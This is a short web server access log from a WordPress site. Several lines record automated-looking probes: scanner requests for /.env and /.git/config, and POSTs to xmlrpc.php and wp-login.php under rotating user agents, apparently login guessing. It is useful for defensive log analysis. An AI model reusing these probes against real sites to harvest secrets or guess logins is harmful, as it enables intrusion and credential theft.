36.133.115.36 - - [26/Aug/2025:16:14:27 +0800] "POST /wp-cron.php?doing_wp_cron=1756196067.4558019638061523437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
107.180.245.224 - - [26/Aug/2025:16:14:27 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15"
107.180.245.224 - - [26/Aug/2025:16:14:28 +0800] "POST /wp-login.php HTTP/1.1" 200 2974 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36"
36.133.115.36 - - [26/Aug/2025:16:16:14 +0800] "POST /wp-cron.php?doing_wp_cron=1756196174.3459470272064208984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
170.64.159.194 - - [26/Aug/2025:16:16:14 +0800] "GET /.env HTTP/1.1" 404 8991 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
170.64.159.194 - - [26/Aug/2025:16:16:15 +0800] "GET /.git/config HTTP/1.1" 404 8989 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
36.133.115.36 - - [26/Aug/2025:16:16:59 +0800] "POST /wp-cron.php?doing_wp_cron=1756196219.2123830318450927734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [26/Aug/2025:16:16:59 +0800] "GET / HTTP/1.1" 200 33394 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [26/Aug/2025:16:20:28 +0800] "POST /wp-cron.php?doing_wp_cron=1756196428.4376950263977050781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
65.109.154.253 - - [26/Aug/2025:16:20:28 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50"
65.109.154.253 - - [26/Aug/2025:16:20:30 +0800] "POST /wp-login.php HTTP/1.1" 200 2971 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0"
36.133.115.36 - - [26/Aug/2025:16:25:29 +0800] "POST /wp-cron.php?doing_wp_cron=1756196729.3334710597991943359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
71.6.199.65 - - [26/Aug/2025:16:25:29 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [26/Aug/2025:16:26:17 +0800] "POST /wp-cron.php?doing_wp_cron=1756196777.1754610538482666015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
103.72.97.210 - - [26/Aug/2025:16:26:17 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0"
103.72.97.210 - - [26/Aug/2025:16:26:18 +0800] "POST /wp-login.php HTTP/1.1" 200 2975 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5"
36.133.115.36 - - [26/Aug/2025:16:32:14 +0800] "POST /wp-cron.php?doing_wp_cron=1756197134.7900419235229492187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.151.95.70 - - [26/Aug/2025:16:32:14 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0"
91.151.95.70 - - [26/Aug/2025:16:32:15 +0800] "POST /wp-login.php HTTP/1.1" 200 2974 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
